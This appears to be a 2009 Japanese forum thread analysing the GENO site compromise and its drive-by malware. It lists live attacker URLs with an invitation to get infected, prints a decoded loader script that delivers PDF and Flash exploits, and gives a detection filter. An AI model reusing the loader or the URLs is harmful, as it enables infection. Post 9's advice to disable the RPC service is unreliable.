GENOウイルススレ
1 :名無しさん@お腹いっぱい。:
(1)感染したWebページをひらく
(2)感染したjsが、94.247.2.195の改変jquery.jsを実行
(3)IP/UAで振り分け処理(Vistaは大丈夫そう?)
(4)PDF/Flash起動。各種ウィルス本体をInternetTempに展開
(5)bufferOverrunでウィルス本体の起動を試行
以下が問題のURL、
"id=2"はpdfの脆弱性を利用し、
buffer overflowを引き起こさせ感染を試みる。(Adobe Collab overflow)
"id=3"はswf(Flash)の脆弱性を利用しoverflowを引き起こさせ、感染を試みる。
いずれも最新のFlash Playerの導入とPDF Readerを入れていれば問題なし(?)
hxxp://94.247.2.195/jquery.js
hxxp://94.247.2.195/news/?id=100
hxxp://94.247.2.195/news/?id=2
hxxp://94.247.2.195/news/?id=3
リンクは切れており現在無害(当環境では)
以下のリンクは生きており感染実験希望の方はドゾ
★危険ですので注意
hxxp://94.247.2.195/news/index.php
少しわかってること:
WINDOWSの正規ファイルを上書き(?)する可能性大
Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
(2)感染したjsが、94.247.2.195の改変jquery.jsを実行
(3)IP/UAで振り分け処理(Vistaは大丈夫そう?)
(4)PDF/Flash起動。各種ウィルス本体をInternetTempに展開
(5)bufferOverrunでウィルス本体の起動を試行
以下が問題のURL、
"id=2"はpdfの脆弱性を利用し、
buffer overflowを引き起こさせ感染を試みる。(Adobe Collab overflow)
"id=3"はswf(Flash)の脆弱性を利用しoverflowを引き起こさせ、感染を試みる。
いずれも最新のFlash Playerの導入とPDF Readerを入れていれば問題なし(?)
hxxp://94.247.2.195/jquery.js
hxxp://94.247.2.195/news/?id=100
hxxp://94.247.2.195/news/?id=2
hxxp://94.247.2.195/news/?id=3
リンクは切れており現在無害(当環境では)
以下のリンクは生きており感染実験希望の方はドゾ
★危険ですので注意
hxxp://94.247.2.195/news/index.php
少しわかってること:
WINDOWSの正規ファイルを上書き(?)する可能性大
Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
|
|
|
2 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:36:01
関連スレ
【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/l50
【ウイルス感染】GENOを語るスレ30【アクセス注意】
http://pc11.2ch.net/test/read.cgi/pc/1239004304/l50
【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/l50
【ウイルス感染】GENOを語るスレ30【アクセス注意】
http://pc11.2ch.net/test/read.cgi/pc/1239004304/l50
3 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:41:30
関連スレ
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★9
http://tsushima.2ch.net/test/read.cgi/news/1239126066/l50
GENOなどのサイトでウイルス感染★8
http://tsushima.2ch.net/test/read.cgi/news/1239097279/l50
★090406 複数板「ウイルスGeno短縮URL」誘導マルチポスト荒らし報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/l50
【ウィルス情報質問 総合スレッド★Part46】
http://pc11.2ch.net/test/read.cgi/sec/1224511070/690-
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★9
http://tsushima.2ch.net/test/read.cgi/news/1239126066/l50
GENOなどのサイトでウイルス感染★8
http://tsushima.2ch.net/test/read.cgi/news/1239097279/l50
★090406 複数板「ウイルスGeno短縮URL」誘導マルチポスト荒らし報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/l50
【ウィルス情報質問 総合スレッド★Part46】
http://pc11.2ch.net/test/read.cgi/sec/1224511070/690-
4 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:41:58
GENOの対応酷いな
まあ自力で駆除はかなり面倒だけど
まあ自力で駆除はかなり面倒だけど
5 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:51:40
GENOは被害者
6 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:52:14
Proxomitron用対策フィルタ。
[Patterns]
Name = "GENO Virus Killer"
Active = TRUE
Limit = 512
Match = "<!-- (document.write\(unescape\([^\n]+)\0 -->"
Replace = "<!-- !!! GENO Virus !!! -->$ALERT( !!! GENO Virus !!!\n\0 )"
[Patterns]
Name = "GENO Virus Killer"
Active = TRUE
Limit = 512
Match = "<!-- (document.write\(unescape\([^\n]+)\0 -->"
Replace = "<!-- !!! GENO Virus !!! -->$ALERT( !!! GENO Virus !!!\n\0 )"
7 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:56:32
>>1
おつ
おつ
8 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:57:32
IIIII NAXOS その6 IIIII
http://jfk.2ch.net/test/read.cgi/classical/1190386402/748
http://jfk.2ch.net/test/read.cgi/classical/1190386402/748
9 :名無しさん@お腹いっぱい。:2009/04/08(水) 11:01:51
セキュリティ対策【危険ポートを閉じる】
【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
Web-based DNS Randomness Test | DNS-OARC
https://www.dns-oarc.net/oarc/services/dnsentropy
を踏んでみて、もし万一「POOR」って表示されたら、
そのDNSはセキュリティ的に「もうだめぽ」ということ。
【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
Web-based DNS Randomness Test | DNS-OARC
https://www.dns-oarc.net/oarc/services/dnsentropy
を踏んでみて、もし万一「POOR」って表示されたら、
そのDNSはセキュリティ的に「もうだめぽ」ということ。
10 :名無しさん@お腹いっぱい。:2009/04/08(水) 11:08:01
GENO以外にもあちこちで報告出てるなー
**** 価格比較のECナビ Part43 ****
http://gimpo.2ch.net/test/read.cgi/point/1238752206/84-120
**** 価格比較のECナビ Part43 ****
http://gimpo.2ch.net/test/read.cgi/point/1238752206/84-120
11 :名無しさん@お腹いっぱい。:2009/04/08(水) 11:09:52
ComboFix(Geekは可)は特定のサイトからのダウソはブロックされるね
DDSも起動せず。
ただComboFixで自動処理するとアカウントにログイン出来なくなる
(正規ファイルを悪玉ファイルに上書き→ComboFixが処理?)
駆除失敗(・ω・`)
DDSも起動せず。
ただComboFixで自動処理するとアカウントにログイン出来なくなる
(正規ファイルを悪玉ファイルに上書き→ComboFixが処理?)
駆除失敗(・ω・`)
12 :名無しさん@お腹いっぱい。:2009/04/08(水) 11:35:19
GENO系の最新情報集めてるスレない?
ニュー速がいちばん人居るのかな
ニュー速がいちばん人居るのかな
13 :名無しさん@お腹いっぱい。:2009/04/08(水) 11:44:32
14 :名無しさん@お腹いっぱい。:2009/04/08(水) 11:59:04
d
張り付いとくか…
張り付いとくか…
15 :名無しさん@お腹いっぱい。:2009/04/08(水) 12:24:45
とりあえずまとめる場所だけ作ったからだれか編集よろしく
http://www29.atwiki.jp/geno/
http://www29.atwiki.jp/geno/
16 :名無しさん@お腹いっぱい。:2009/04/08(水) 12:47:26
17 :名無しさん@お腹いっぱい。:2009/04/08(水) 13:33:48
PC通販サイト「GENO」のサイトに改ざんの疑い
ttp://internet.watch.impress.co.jp/cda/news/2009/04/07/23057.html
PC通販ショップGENOのサイトにマルウェアが仕込まれる
ttp://www.excite.co.jp/News/column/20090407/Slashdot_09_04_07_042220.html
アイティメディア株式会社 : 当社サイトにて掲載した広告のリンク先ページにおけるウイルス感染について ご報告と対処のお願い
ttp://corp.itmedia.co.jp/corp/notice/20090407.html
ttp://internet.watch.impress.co.jp/cda/news/2009/04/07/23057.html
PC通販ショップGENOのサイトにマルウェアが仕込まれる
ttp://www.excite.co.jp/News/column/20090407/Slashdot_09_04_07_042220.html
アイティメディア株式会社 : 当社サイトにて掲載した広告のリンク先ページにおけるウイルス感染について ご報告と対処のお願い
ttp://corp.itmedia.co.jp/corp/notice/20090407.html
18 :名無しさん@お腹いっぱい。:2009/04/08(水) 13:44:23
19 :名無しさん@お腹いっぱい。:2009/04/08(水) 13:49:58
今感染してみたけど動作してんのか?
ファイル生成→自身を削除
で終わりなんだけど
ただIEが凄い不安定だ
ファイル生成→自身を削除
で終わりなんだけど
ただIEが凄い不安定だ
20 :名無しさん@お腹いっぱい。:2009/04/08(水) 14:09:22
どんな挙動をするか本当の所はまだ判明してないのに…
これからの報告に期待する
人柱乙
これからの報告に期待する
人柱乙
21 :名無しさん@お腹いっぱい。:2009/04/08(水) 14:13:39
仮想で踏んで分析してくれてるんじゃまいか
22 :名無しさん@お腹いっぱい。:2009/04/08(水) 14:35:13
>>18
踏んでいいの?怖いんだけど
踏んでいいの?怖いんだけど
23 :名無しさん@お腹いっぱい。:2009/04/08(水) 14:37:54
GENO ウイルス に一致する日本語のページ 約 42,800 件中 51 - 100 件目 (0.21 秒)
http://www.google.com/search?hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&num=50
http://www.google.com/search?hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&num=50
24 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:14:22
SDFixも動かない
悪玉ファイルは見つからない
どうなってんの?
悪玉ファイルは見つからない
どうなってんの?
25 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:24:14
26 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:38:47
PDF ReaderもFlash Player最新だったんだけどなあ
27 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:44:40
adobeのPDF導入してなくても感染したって話もあったからコワイね。
未だに挙動含めてはっきりしたことわからない。
未だに挙動含めてはっきりしたことわからない。
28 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:51:17
今回は既知の脆弱性を突いたウィルスだったけど、
これが未対応・未発表の脆弱性とかだったらと思うとブルブル
これが未対応・未発表の脆弱性とかだったらと思うとブルブル
29 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:53:34
サイトを乗っ取られる会社がアホなんだよ。
30 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:54:01
sqlsodbc.chmファイルが上書きされて
乗っ取られた正規ファイルがsqlsodbc.chmにアクセスしまくってるんだけど
もう諦める。
乗っ取られた正規ファイルがsqlsodbc.chmにアクセスしまくってるんだけど
もう諦める。
31 :名無しさん@お腹いっぱい。:2009/04/08(水) 16:27:40
GENO ウイルス ニュース検索結果
http://news.google.co.jp/news/search?um=1&ned=jp&hl=ja&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&cf=all&scoring=n
http://news.google.co.jp/news/search?um=1&ned=jp&hl=ja&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&cf=all&scoring=n
32 :名無しさん@お腹いっぱい。:2009/04/08(水) 16:35:14
>9
Source Port Randomness: GREAT
All
Source Port Randomness: GREAT
All
33 :名無しさん@お腹いっぱい。:2009/04/08(水) 16:43:05
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★9
http://tsushima.2ch.net/test/read.cgi/news/1239126066/
【緊急警報】GENOなどのサイトでウイルス感染(2ちゃんに貼られた不明なリンクへも飛ぶべからず!!)
http://pc11.2ch.net/test/read.cgi/pcnews/1239034325/
http://tsushima.2ch.net/test/read.cgi/news/1239126066/
【緊急警報】GENOなどのサイトでウイルス感染(2ちゃんに貼られた不明なリンクへも飛ぶべからず!!)
http://pc11.2ch.net/test/read.cgi/pcnews/1239034325/
34 :名無しさん@お腹いっぱい。:2009/04/08(水) 16:46:43
せめてオンラインスキャン程度薦めてくれれば擁護のしようもあるのだが
35 :名無しさん@お腹いっぱい。:2009/04/08(水) 16:52:09
36 :名無しさん@お腹いっぱい。:2009/04/08(水) 16:54:14
行徳のSTEPの時代からひいきにしてたのに実に残念だ
37 :名無しさん@お腹いっぱい。:2009/04/08(水) 17:54:16
ν速からきますた。。。
>>19,35
ν速のスレでうpされたLa.exeのバイナリをUPX圧縮を解除してバイナリエディタで中を覗いたけど、
どうもLa.exeではKドライブにある _t というフォルダを消して、_tフォルダ内のu.batを消している感じの文字列が見えた。
恐らくこの _t というフォルダの中がどうなっているのかを調べたら
具体的にどんな内容が盗み出されているかが判るんじゃないかなって思うよ。
ただ、ちょっと疑問なのはν速のスレで感染したらしき人の報告ではCドライブの直下にu.batが出来ていたらしいって事。
もしかするとこのEXEの前に予めジャンクションを張っているのか、KドライブにCドライブのどこかにある_tフォルダを
SUBSTしてるのかも知れない。
感染した状態で即効でこの _k フォルダの中身を調べてしまえばよいのかと。
>>19,35
ν速のスレでうpされたLa.exeのバイナリをUPX圧縮を解除してバイナリエディタで中を覗いたけど、
どうもLa.exeではKドライブにある _t というフォルダを消して、_tフォルダ内のu.batを消している感じの文字列が見えた。
恐らくこの _t というフォルダの中がどうなっているのかを調べたら
具体的にどんな内容が盗み出されているかが判るんじゃないかなって思うよ。
ただ、ちょっと疑問なのはν速のスレで感染したらしき人の報告ではCドライブの直下にu.batが出来ていたらしいって事。
もしかするとこのEXEの前に予めジャンクションを張っているのか、KドライブにCドライブのどこかにある_tフォルダを
SUBSTしてるのかも知れない。
感染した状態で即効でこの _k フォルダの中身を調べてしまえばよいのかと。
38 :名無しさん@お腹いっぱい。:2009/04/08(水) 17:57:38
× 感染した状態で即効でこの _k フォルダの中身を調べてしまえばよいのかと。
○ 感染した状態で即効でこの _t フォルダの中身を調べてしまえばよいのかと。
訂正。
○ 感染した状態で即効でこの _t フォルダの中身を調べてしまえばよいのかと。
訂正。
39 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:02:23
>>37
La.exeとGENOウイルスは同じものかい?
La.exeとGENOウイルスは同じものかい?
40 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:04:38
>>37
そんな感じだけど解析困難だよ
そんな感じだけど解析困難だよ
41 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:07:36
42 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:11:13
43 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:13:06
MDLに94.247.*.*
が沢山あるな。
登録日見ると今年に入って頑張って流行らせようとしてるみたい。
が沢山あるな。
登録日見ると今年に入って頑張って流行らせようとしてるみたい。
44 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:14:34
45 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:17:02
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
u.batあたりの挙動はここにまとめられてる
u.batあたりの挙動はここにまとめられてる
46 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:18:39
>>39
まったく同じとは言い切れないがほぼ一緒か?。
GENOとcrestronjapan.com、>>1の生きているリンクから踏んだけど
どれも共通してu.batが生成されたから同じような動きをしてる希ガス。
まったく同じとは言い切れないがほぼ一緒か?。
GENOとcrestronjapan.com、>>1の生きているリンクから踏んだけど
どれも共通してu.batが生成されたから同じような動きをしてる希ガス。
47 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:27:01
このウイルスに感染すると、
・特定のサイトに接続できなくなる
・特定の駆除ソフト、ログ取得ソフトがブロックされる(DDS、SDFix類がブロックされる)
・レジストリエディタが起動しない(リネームすることにより回避可能)
・ネットブラウジングが困難になる。(問題発生しまくり)
・sqlsodbc.chmにWindowsの正規プログラム(?)がやたらとアクセスしてる
・Windowsの正規プログラムがsqlsodbc.chmを作成したりする。
おれの環境では不正なサイトにアクセスは確認できなかった
sqlsodbc.chm←これヘルプファイルだし特に危険じゃないと思うんだけど
何なんだ
・特定のサイトに接続できなくなる
・特定の駆除ソフト、ログ取得ソフトがブロックされる(DDS、SDFix類がブロックされる)
・レジストリエディタが起動しない(リネームすることにより回避可能)
・ネットブラウジングが困難になる。(問題発生しまくり)
・sqlsodbc.chmにWindowsの正規プログラム(?)がやたらとアクセスしてる
・Windowsの正規プログラムがsqlsodbc.chmを作成したりする。
おれの環境では不正なサイトにアクセスは確認できなかった
sqlsodbc.chm←これヘルプファイルだし特に危険じゃないと思うんだけど
何なんだ
48 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:32:00
>>47
HTMLヘルプの脆弱性でも狙ってるとか
HTMLヘルプの脆弱性でも狙ってるとか
49 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:33:04
>>47
あくまで推測だけど、PDFファイルやFlashファイルでバッファオーバーフローの脆弱性を突いたみたいに
HTMLヘルプのhh.exeにも同じ様な脆弱性があって、それを突いてくるファイルなのかと。
あくまで推測だけど、PDFファイルやFlashファイルでバッファオーバーフローの脆弱性を突いたみたいに
HTMLヘルプのhh.exeにも同じ様な脆弱性があって、それを突いてくるファイルなのかと。
50 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:35:31
AMD64のCPUに替えれば無問題
51 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:38:00
- Files Created:
C:\bgrn.mym
C:\u.bat
- Files Read:
C:\WINDOWS\system32\sqlsodbc.chm
- Files Modified:
C:\WINDOWS\system32\sqlsodbc.chm
C:\bgrn.mym
C:\u.bat
- Files Deleted:
C:\_.t
C:\u.bat
C:\bgrn.mym
C:\u.bat
- Files Read:
C:\WINDOWS\system32\sqlsodbc.chm
- Files Modified:
C:\WINDOWS\system32\sqlsodbc.chm
C:\bgrn.mym
C:\u.bat
- Files Deleted:
C:\_.t
C:\u.bat
52 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:38:01
CVE-2009-0119だったりして
53 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:44:24
54 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:44:43
hxxp://94.247.2.195/news/index.php
↓デコードしてみた
document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");
var obj=null;try{obj=new ActiveXObject("AcroPDF.PDF");}catch(e){}if(!obj){try{obj=new ActiveXObject("PDF.PdfCtrl");
}catch(e){}}if(obj)document.write('<embed src="http://94.247.2.195/news/?id=2" width=100 height=100 type="application/pdf"></embed>');
try{var FV=0;FV=(new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$"+"version").split(",");
}catch(e){}if(FV&&(FV[2]<124))document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=middle>
<param name="movie" value="http://94.247.2.195/news/?id=3"/><param name="quality" value="high"/>
<param name="bgcolor" value="#ffffff"/><embed src="http://94.247.2.195/news/?id=3"/></embed></object>');document.write("</div>");
↓デコードしてみた
document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");
var obj=null;try{obj=new ActiveXObject("AcroPDF.PDF");}catch(e){}if(!obj){try{obj=new ActiveXObject("PDF.PdfCtrl");
}catch(e){}}if(obj)document.write('<embed src="http://94.247.2.195/news/?id=2" width=100 height=100 type="application/pdf"></embed>');
try{var FV=0;FV=(new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$"+"version").split(",");
}catch(e){}if(FV&&(FV[2]<124))document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=middle>
<param name="movie" value="http://94.247.2.195/news/?id=3"/><param name="quality" value="high"/>
<param name="bgcolor" value="#ffffff"/><embed src="http://94.247.2.195/news/?id=3"/></embed></object>');document.write("</div>");
55 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:47:03
>>53
windows update繋がります?
windows update繋がります?
↑リンク外すの忘れてました;;
57 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:48:43
58 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:49:05
オイオイ
59 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:58:44
いろいろExplorer.exe壊したw
60 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:04:21
la.exeを実行したら
sqlsodbc.chm
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations
を書き換えるよとcomodoさんが言った
sqlsodbc.chm
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations
を書き換えるよとcomodoさんが言った
61 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:06:39
WikiのKaspersky、Nortonで駆除で来たってネタだろw
バリバリ感染した状態でANTIDOTE(カスペエンジン)最新にして
スキャンかけたけど問題のjsファイルしか引っかからなかったぞw
当然症状は治らず
つまりアンチウイルスは役に立たない
必死にオンラインスキャンしてるくらいだったらリカバリーするべき
バリバリ感染した状態でANTIDOTE(カスペエンジン)最新にして
スキャンかけたけど問題のjsファイルしか引っかからなかったぞw
当然症状は治らず
つまりアンチウイルスは役に立たない
必死にオンラインスキャンしてるくらいだったらリカバリーするべき
62 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:14:26
カスペのオンラインスキャンをやろうと思ったのですが、
アプリケーションのデジタル証明にエラーがあります。〜
と出るのですが、気にせず実行してよいものなのでしょうか?
それとも皆様はこの表示出ません?
アプリケーションのデジタル証明にエラーがあります。〜
と出るのですが、気にせず実行してよいものなのでしょうか?
それとも皆様はこの表示出ません?
63 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:14:54
自作PC板
【馬鹿】GENOを語るスレ23【ID版に移動】
http://pc11.2ch.net/test/read.cgi/jisaku/1231510507/l50
【顧客相手に】GENOを語るスレ24【サイバージェノサイド】
http://pc11.2ch.net/test/read.cgi/jisaku/1239183817/l50
【馬鹿】GENOを語るスレ23【ID版に移動】
http://pc11.2ch.net/test/read.cgi/jisaku/1231510507/l50
【顧客相手に】GENOを語るスレ24【サイバージェノサイド】
http://pc11.2ch.net/test/read.cgi/jisaku/1239183817/l50
64 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:15:08
Windows NT
( ゚Д゚)ポカーン
( ゚Д゚)ポカーン
65 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:17:37
>>52
マイクロソフトWindows CHMファイル処理バッファオーバーフロー脆弱性
問題のため、CHMファイルを処理するとき、マイクロソフトWindowsはバッファオーバーフロー脆弱性の傾向があります。
首尾よくこの問題を利用するのに、攻撃者は、メモリを崩壊させて、これらのファイルに関連しているアプリケーションを墜落させるでしょう。
この問題の本質を考えて、また、攻撃者は勝手な規準を実行できるかもしれませんが、これは確認されていません。
Windows XP Service Pack3は被害を受け易いです。 また、他のバージョンは影響を受けるかもしれません。
マイクロソフトWindows CHMファイル処理バッファオーバーフロー脆弱性
問題のため、CHMファイルを処理するとき、マイクロソフトWindowsはバッファオーバーフロー脆弱性の傾向があります。
首尾よくこの問題を利用するのに、攻撃者は、メモリを崩壊させて、これらのファイルに関連しているアプリケーションを墜落させるでしょう。
この問題の本質を考えて、また、攻撃者は勝手な規準を実行できるかもしれませんが、これは確認されていません。
Windows XP Service Pack3は被害を受け易いです。 また、他のバージョンは影響を受けるかもしれません。
66 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:21:42
67 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:34:11
>>60
で、実害は?
で、実害は?
68 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:35:55
今のところの感染確認方法は「sqlsodbc.chm」のタイムスタンプが最近だったらm9(^Д^)
古かったら⊂(^ω^)⊃セフセフ か
古かったら⊂(^ω^)⊃セフセフ か
69 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:37:09
未だ修正が行われない crestronjapan.com だが、ヘッダにこんなんあった。
<meta name="generator" content="Movable Type Open Source 4.12" />
<meta name="generator" content="Movable Type Open Source 4.12" />
70 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:37:40
71 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:09:37
なるほど、メモリ上のexeだけ書き換えられるのね。
72 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:09:52
>>70
【ウイルス感染】GENOを語るスレ30【アクセス注意】
http://pc11.2ch.net/test/read.cgi/pc/1239004304/
887 名前:名無しさん[sage] 投稿日:2009/04/08(水) 19:48:23 0
家のPCがモロ感染してたので人柱ってみた。。
結論から言うと、感染者は再インスコしかなさそう。
所要システムファイルが書き換えられてて、修復のしようがない。
で、元凶の書き換え元ファイルはまだ特定できないんだが、
とりあえずC:\WINDOWS\agh.givが作成されてて、
消しても即生成されるようなので、同名ファイルがある人は注意ね。
また追って人柱ってみます。。
889 名前:887[sage] 投稿日:2009/04/08(水) 19:52:50 0
ちなみに、カスペやトレンドマイクロのオンラインスキャンでは全く感知せず。
新種のウイルスだと思われ。
今んとこ、書き換えられてる(メモリ上書きされてる?)プロセスは以下の通り。
svchost.exe
spoolsv.exe
exproler.exe
alg.exe
winlogon.exe
おそらくファイル自体は書き換えられてない。
だからアンチウイルスでもヒットしない。
ちなみに、cmd.exeを実行したら一気に発祥したので、
疑いのある人はcmd.exeを実行しないように。
【ウイルス感染】GENOを語るスレ30【アクセス注意】
http://pc11.2ch.net/test/read.cgi/pc/1239004304/
887 名前:名無しさん[sage] 投稿日:2009/04/08(水) 19:48:23 0
家のPCがモロ感染してたので人柱ってみた。。
結論から言うと、感染者は再インスコしかなさそう。
所要システムファイルが書き換えられてて、修復のしようがない。
で、元凶の書き換え元ファイルはまだ特定できないんだが、
とりあえずC:\WINDOWS\agh.givが作成されてて、
消しても即生成されるようなので、同名ファイルがある人は注意ね。
また追って人柱ってみます。。
889 名前:887[sage] 投稿日:2009/04/08(水) 19:52:50 0
ちなみに、カスペやトレンドマイクロのオンラインスキャンでは全く感知せず。
新種のウイルスだと思われ。
今んとこ、書き換えられてる(メモリ上書きされてる?)プロセスは以下の通り。
svchost.exe
spoolsv.exe
exproler.exe
alg.exe
winlogon.exe
おそらくファイル自体は書き換えられてない。
だからアンチウイルスでもヒットしない。
ちなみに、cmd.exeを実行したら一気に発祥したので、
疑いのある人はcmd.exeを実行しないように。
73 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:09:57
>>69
ほう。OSやhttpdはバラバラなようだから、MT(もしくはDB)の脆弱性なのか?
ほう。OSやhttpdはバラバラなようだから、MT(もしくはDB)の脆弱性なのか?
74 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:12:37
>>68
少なくてもCHMファイルの作成日時もしくは更新日時がウィルスを踏んで食らった時刻か、
丁度9時間ズレの時刻になってると感染確定だね。
ただ、このCHMファイルが書き換えられていなくても、
他の書き換えが行われている可能性もゼロじゃないから、
この件だけで感染の判断材料に使うのは危険だと思う。
少なくてもCHMファイルの作成日時もしくは更新日時がウィルスを踏んで食らった時刻か、
丁度9時間ズレの時刻になってると感染確定だね。
ただ、このCHMファイルが書き換えられていなくても、
他の書き換えが行われている可能性もゼロじゃないから、
この件だけで感染の判断材料に使うのは危険だと思う。
75 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:15:30
76 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:23:20
上のと動作が微妙に違うみたい
ttp://anubis.iseclab.org/?action=result&task_id=1a4c445790ab425a43dc7bb547f59aa74&format=html
ttp://anubis.iseclab.org/?action=result&task_id=1a4c445790ab425a43dc7bb547f59aa74&format=html
77 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:26:48
>>75
進入経路が確定しないってのもヤだよな。
http://www3.atword.jp/gnome/2009/04/08/unexpected-latvia-tour-its-still-free/
ここで紹介されてるパターンだと、FTPのパスワードが盗まれた(簡単過ぎた?)ことが
原因らしいが・・・・・。
未だサイトを閉じないパピーヌと日本クレストロンはどう対処する気なんだ。
クレストロンは鯖が米国にあるっぽいので向こうの営業時間(明日未明)にならんと
